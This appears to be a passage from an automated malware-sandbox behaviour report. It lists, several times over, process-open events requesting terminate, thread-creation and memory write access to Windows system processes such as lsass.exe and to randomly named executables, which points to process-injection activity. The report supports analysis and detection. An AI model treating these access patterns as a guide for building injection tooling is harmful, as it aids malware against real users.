| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\shirts_cumshots_compaq.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\league.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\js_sound.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\beast-dry.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft synchronization services\forecastsgeographic.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows portable devices\reno.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\specreformwear.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows photo viewer\rr_publications.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\solo.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\beam.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\adobe\configurations.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows sidebar\fact-film-anticipated.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\wanting villages.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\engagementresearchersmonkey.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\surgical-marcus.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\iexplore.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\iexplore.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\shirts_cumshots_compaq.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\league.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\js_sound.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\beast-dry.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft synchronization services\forecastsgeographic.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows portable devices\reno.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\specreformwear.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows photo viewer\rr_publications.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\solo.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\beam.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\adobe\configurations.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows sidebar\fact-film-anticipated.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\wanting villages.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\engagementresearchersmonkey.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\surgical-marcus.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\iexplore.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\iexplore.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\shirts_cumshots_compaq.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\league.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\js_sound.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\beast-dry.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft synchronization services\forecastsgeographic.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows portable devices\reno.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\specreformwear.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows photo viewer\rr_publications.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\solo.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\beam.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\adobe\configurations.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows sidebar\fact-film-anticipated.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\wanting villages.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
